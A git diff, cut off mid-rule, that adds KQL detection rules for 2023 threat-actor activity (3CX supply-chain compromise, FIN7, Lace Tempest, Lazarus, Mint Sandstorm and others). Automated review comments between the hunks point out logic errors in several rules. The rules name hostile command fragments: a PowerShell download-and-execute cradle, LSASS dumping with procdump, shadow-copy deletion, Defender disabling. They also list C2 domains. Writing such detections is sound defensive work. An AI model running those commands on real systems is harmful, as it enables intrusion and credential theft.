+| where (SHA256 startswith "7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896" or SHA256 startswith "11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03" or SHA256 startswith "F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952" or SHA256 startswith "8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423") or (SHA1 startswith "BF939C9C261D27EE7BB92325CC588624FCA75429" or SHA1 startswith "20D554A80D759C50D6537DD7097FED84DD258B3E" or SHA1 startswith "894E7D4FFD764BB458809C7F0643694B036EAD30" or SHA1 startswith "3B3E778B647371262120A523EB873C20BB82BEAF") or (MD5 startswith "74BC2D0B6680FAA1A5A76B27E5479CBC" or MD5 startswith "82187AD3F0C6C225E2FBA0C867280CC9" or MD5 startswith "11BC82A9BD8297BD0823BCE5D6202082" or MD5 startswith "7FAEA2B01796B80D180399040BB69835")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
new file mode 100644
index 00000000..265d4327
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
@@ -0,0 +1,12 @@
+// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where (RemoteUrl contains "akamaicontainer.com" or RemoteUrl contains "akamaitechcloudservices.com" or RemoteUrl contains "azuredeploystore.com" or RemoteUrl contains "azureonlinecloud.com" or RemoteUrl contains "azureonlinestorage.com" or RemoteUrl contains "dunamistrd.com" or RemoteUrl contains "glcloudservice.com" or RemoteUrl contains "journalide.org" or RemoteUrl contains "msedgepackageinfo.com" or RemoteUrl contains "msstorageazure.com" or RemoteUrl contains "msstorageboxes.com" or RemoteUrl contains "officeaddons.com" or RemoteUrl contains "officestoragebox.com" or RemoteUrl contains "pbxcloudeservices.com" or RemoteUrl contains "pbxphonenetwork.com" or RemoteUrl contains "pbxsources.com" or RemoteUrl contains "qwepoi123098.com" or RemoteUrl contains "sbmsa.wiki" or RemoteUrl contains "sourceslabs.com" or RemoteUrl contains "visualstudiofactory.com" or RemoteUrl contains "zacharryblogs.com") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql
new file mode 100644
index 00000000..ba655e8f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Compromised 3CXDesktopApp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects execution of known compromised version of 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate usage of 3CXDesktopApp
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName =~ "3CXDesktopApp.exe" or FolderPath endswith "\\3CXDesktopApp.exe" or ProcessVersionInfoProductName =~ "3CX Desktop App") and ProcessVersionInfoProductVersion contains "18.12.") or ((SHA256 startswith "DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC" or SHA256 startswith "54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02" or SHA256 startswith "D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE" or SHA256 startswith "FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405" or SHA256 startswith "5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734" or SHA256 startswith "A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203" or SHA256 startswith "AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868" or SHA256 startswith "59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983") or (SHA1 startswith "480DC408EF50BE69EBCF84B95750F7E93A8A1859" or SHA1 startswith "3B43A5D8B83C637D00D769660D01333E88F5A187" or SHA1 startswith "6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA" or SHA1 startswith "E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1" or SHA1 startswith "8433A94AEDB6380AC8D4610AF643FB0E5220C5CB" or SHA1 startswith "413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5" or SHA1 startswith "BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA" or SHA1 startswith "BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E") or (MD5 startswith "BB915073385DD16A846DFA318AFA3C19" or MD5 startswith "08D79E1FFFA244CC0DC61F7D2036ACA9" or MD5 startswith "4965EDF659753E3C05D800C6C8A23A7A" or MD5 startswith "9833A4779B69B38E3E51F04E395674C6" or MD5 startswith "704DB9184700481A56E5100FB56496CE" or MD5 startswith "8EE6802F085F7A9DF7E0303E65722DC0" or MD5 startswith "F3D4144860CA10BA60F7EF4D176CC736" or MD5 startswith "0EEB1C0133EB4D571178B2D9D14CE3E9"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql
new file mode 100644
index 00000000..a160a293
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_compromised_3cxdesktopapp_update_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Compromised 3CXDesktopApp Update Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--update" and ProcessCommandLine contains "http" and ProcessCommandLine contains "/electron/update/win32/18.12") and FolderPath endswith "\\3CXDesktopApp\\app\\update.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql
new file mode 100644
index 00000000..29aeaaab
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/potential_suspicious_child_process_of_3cxdesktopapp.kql
@@ -0,0 +1,10 @@
+// Title: Potential Suspicious Child Process Of 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
new file mode 100644
index 00000000..3df96209
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Cozy-Bear/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
@@ -0,0 +1,10 @@
+// Title: DLL Names Used By SVR For GraphicalProton Backdoor
+// Author: CISA
+// Date: 2023-12-18
+// Level: medium
+// Description: Hunts known SVR-specific DLL names.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AclNumsInvertHost.dll" or FolderPath endswith "\\AddressResourcesSpec.dll" or FolderPath endswith "\\BlendMonitorStringBuild.dll" or FolderPath endswith "\\ChildPaletteConnected.dll" or FolderPath endswith "\\DeregisterSeekUsers.dll" or FolderPath endswith "\\HandleFrequencyAll.dll" or FolderPath endswith "\\HardSwapColor.dll" or FolderPath endswith "\\LengthInMemoryActivate.dll" or FolderPath endswith "\\ModeBitmapNumericAnimate.dll" or FolderPath endswith "\\ModeFolderSignMove.dll" or FolderPath endswith "\\ParametersNamesPopup.dll" or FolderPath endswith "\\PerformanceCaptionApi.dll" or FolderPath endswith "\\ScrollbarHandleGet.dll" or FolderPath endswith "\\UnregisterAncestorAppendAuto.dll" or FolderPath endswith "\\WowIcmpRemoveReg.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql
new file mode 100644
index 00000000..8a21aa8a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_dll_sideloading_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT DLL Sideloading Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith ":\\ProgramData\\Version.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\clip.exe") or (FolderPath endswith ":\\ProgramData\\DSROLE.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\wsmprovhost.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql
new file mode 100644
index 00000000..2ba18f53
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_file_creation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Diamond Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\ProgramData\\4800-84DC-063A6A41C5C" or FolderPath endswith ":\\ProgramData\\clip.exe" or FolderPath endswith ":\\ProgramData\\DSROLE.dll" or FolderPath endswith ":\\ProgramData\\Forest64.exe" or FolderPath endswith ":\\ProgramData\\readme.md" or FolderPath endswith ":\\ProgramData\\Version.dll" or FolderPath endswith ":\\ProgramData\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql
new file mode 100644
index 00000000..c360500b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_process_activity_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT Process Activity Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects process creation activity indicators related to Diamond Sleet APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " uTYNkfKxHiZrx3KJ"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql
new file mode 100644
index 00000000..0692f2c2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Diamond-Sleet/diamond_sleet_apt_scheduled_task_creation_registry.kql
@@ -0,0 +1,10 @@
+// Title: Diamond Sleet APT Scheduled Task Creation - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Windows TeamCity Settings User Interface"
\ No newline at end of file
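Review bot: In the scheduled-task registry rule, `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*"` keeps the Sigma wildcard as a literal `*`, so `endswith` requires the key name to end in an asterisk and the predicate never matches; the task-name `contains` clause after it therefore never gets a chance to narrow anything. Since the intent is "any key under TaskCache\Tree", change it to `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\"`. The process-activity hunk sharing this line converts cleanly.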
diff --git a/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
new file mode 100644
index 00000000..2d0933e1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-noni -nop -exe bypass -f \\\\" and ProcessCommandLine contains "ADMIN$") or (ProcessCommandLine contains "-ex bypass -noprof -nolog -nonint -f" and ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql
new file mode 100644
index 00000000..0c7fb559
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/FIN7/potential_apt_fin7_related_powershell_script_created.kql
@@ -0,0 +1,10 @@
+// Title: Potential APT FIN7 Related PowerShell Script Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath in~ ("host_ip.ps1") or FolderPath endswith "_64refl.ps1"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql
new file mode 100644
index 00000000..0f704d81
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_cobalt_strike_download.kql
@@ -0,0 +1,12 @@
+// Title: Lace Tempest Cobalt Strike Download
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(" and ProcessCommandLine contains "/a')"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql
new file mode 100644
index 00000000..7b577400
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_file_indicators.kql
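Review bot: `FolderPath in~ ("host_ip.ps1")` in the FIN7 script-creation rule compares the full path column against a bare file name, so that branch can never be true; only the `_64refl.ps1` suffix test next to it can fire. The first branch needs the same suffix form, `| where FolderPath endswith "\\host_ip.ps1" or FolderPath endswith "_64refl.ps1"`, or an exact test on the separate `FileName` column that `DeviceFileEvents` carries (`FileName =~ "host_ip.ps1"`). Rules converted from Sigma `TargetFilename` exact matches are likely to share this pattern and are worth a sweep.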
@@ -0,0 +1,12 @@
+// Title: Lace Tempest File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\leave") or FolderPath contains ":\\Program Files\\SysAidServer\\tomcat\\webapps\\user."
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql
new file mode 100644
index 00000000..4d901408
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lace-Tempest/lace_tempest_malware_loader_execution.kql
@@ -0,0 +1,12 @@
+// Title: Lace Tempest Malware Loader Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-09
+// Level: high
+// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where SHA256 startswith "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe"
\ No newline at end of file
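Review bot: The description in `lace_tempest_file_indicators.kql` says the rule detects PowerShell script creation associated with FIN7, but the query matches nothing of the kind: it looks for artifacts under the SysAid Tomcat `webapps` directory (`usersfiles\\user.exe`, `usersfiles.war`, `leave`, `user.`). The header text appears to have been inherited from the FIN7 script rule and should describe this query, e.g. `// Description: Detects file creation of loader and web artifacts under the SysAid Server Tomcat webapps directory, as reported in Lace Tempest activity`. An analyst triaging a hit reads that header first, so it should not point them at the wrong actor and artifact type.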
diff --git a/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql
new file mode 100644
index 00000000..c4eb1c3d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql
@@ -0,0 +1,12 @@
+// Title: Lazarus APT DLL Sideloading Activity
+// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: high
+// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\colorcpl.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\colorui.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\tabcal.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\HID.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Oracle\\Java\\fixmapi.exe" and FolderPath =~ "C:\\ProgramData\\Oracle\\Java\\mapistub.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramShared\\PresentationHost.exe" and FolderPath =~ ":\\ProgramShared\\mscoree.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
new file mode 100644
index 00000000..df62ad21
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
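Review bot: The fourth sideload pair tests `FolderPath =~ ":\\ProgramShared\\mscoree.dll"`, and `=~` is whole-string equality, so a value that starts with a colon and no drive letter will never equal a real image path; that pair is dead while the other three spell out `C:\\`. Either make it consistent with its sibling, `FolderPath =~ "C:\\ProgramShared\\mscoree.dll"`, or, if the drive letter was meant to stay open, use `FolderPath endswith ":\\ProgramShared\\mscoree.dll"`. The exact `=~` on the other pairs also means a sideload from a different drive is missed, which may be acceptable but is worth stating in the False Positives/limitations header.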
@@ -0,0 +1,12 @@
+// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "aspera" and InitiatingProcessFolderPath contains "\\ruby") and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or (ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql
new file mode 100644
index 00000000..30d8b440
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql
@@ -0,0 +1,10 @@
+// Title: Mint Sandstorm - Log4J Wstomcat Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe" and (not(FolderPath endswith "\\repadmin.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql
new file mode 100644
index 00000000..f77b004e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql
@@ -0,0 +1,12 @@
+// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "\\java" and (InitiatingProcessFolderPath contains "manageengine" or InitiatingProcessFolderPath contains "ServiceDesk")) and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\ssession") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains 